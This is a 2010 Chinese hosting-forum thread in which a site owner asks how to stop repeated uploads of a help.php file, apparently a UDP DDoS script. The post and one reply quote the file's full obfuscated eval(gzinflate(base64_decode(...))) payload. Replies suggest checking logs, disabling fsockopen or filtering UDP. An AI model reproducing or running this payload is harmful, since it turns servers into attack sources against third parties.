全球主机交流论坛

标题: 最近总是被上传help.php 这个文件是远程攻击 [打印本页]

作者: 1878076 时间: 2010-9-9 10:01
标题: 最近总是被上传help.php 这个文件是远程攻击
请问有没有遇到的。被上传cchelp.php 和 help.php

删掉，又给上传，流量超高，这是哪方面的漏洞，请指教！

eval(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

内容就是这样，参考：http://hi.baidu.com/momoca/blog/ ... 03750e908f9d7e.html

请大家帮忙解决下。

作者: 退休老军医 时间: 2010-9-9 10:04
程序漏洞吧

作者: domin 时间: 2010-9-9 10:09
程序或者服务器有漏洞或者密码泄露了，多数是你在用的PHP程序的漏洞，我们也遇到不少这样的。。。
如果你不怎么用UDP的话可以封掉UDP包发送

作者: 组长 时间: 2010-9-9 10:10
检查下吧

作者: yculer 时间: 2010-9-9 10:12
我也碰到过。

作者: 悲剧男2号 时间: 2010-9-9 10:47
提示: 作者被禁止或删除内容自动屏蔽

作者: 1878076 时间: 2010-9-9 13:19

作者: winsock 时间: 2010-9-9 13:26
查日志，看第一个访问这个页面的IP是什么，再查这个IP之前访问过的页面分别是什么

作者: cuxian 时间: 2010-9-9 13:31
漏洞吧

作者: hellowind 时间: 2010-9-9 14:03
提示: 作者被禁止或删除内容自动屏蔽

作者: usa 时间: 2010-9-9 15:03
echo(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

执行看看看原代码就知道是啥了。。。

作者: hklcf 时间: 2010-9-9 15:11
被利用作DDOS攻擊...

作者: cnx 时间: 2010-9-9 16:46

作者: 1878076 时间: 2010-9-15 19:36
还是没有解决办法

作者: debian 时间: 2010-9-15 19:39
提示: 作者被禁止或删除内容自动屏蔽

作者: cpuer 时间: 2010-9-15 19:49
标题: 回复 16# 的帖子
经常把服务器带宽给占满。

作者: jiangchunlin 时间: 2010-9-15 20:00
提示: 作者被禁止或删除内容自动屏蔽

作者: cmse 时间: 2010-9-15 20:16
楼上。是不是scok 这个参数。。？

作者: 1878076 时间: 2010-9-15 20:23
禁用哪个参数啊，朋友，能不能说清楚！谢啦！

作者: 1878076 时间: 2010-9-15 20:28
占用带宽，就消耗流量

作者: cpuer 时间: 2010-9-15 22:10

原帖由 jiangchunlin 于 2010-9-15 20:00 发表
禁用php的一个参数这东西就没效了原来虚拟主机客户拿我服务器这么搞过

具体说下是哪个？

作者: icest 时间: 2010-9-16 03:26

原帖由 cpuer 于 2010-9-15 22:10 发表

具体说下是哪个？

fsockopen函数吧

作者: domin 时间: 2010-9-16 20:12

原帖由 icest 于 2010-9-16 03:26 发表

fsockopen函数吧

禁用了的话会影响某些程序正常使用.
所以还是过滤UDP包来解决吧

作者: 1878076 时间: 2010-9-18 18:52

欢迎光临全球主机交流论坛 (https://loc.daji.eu.org/)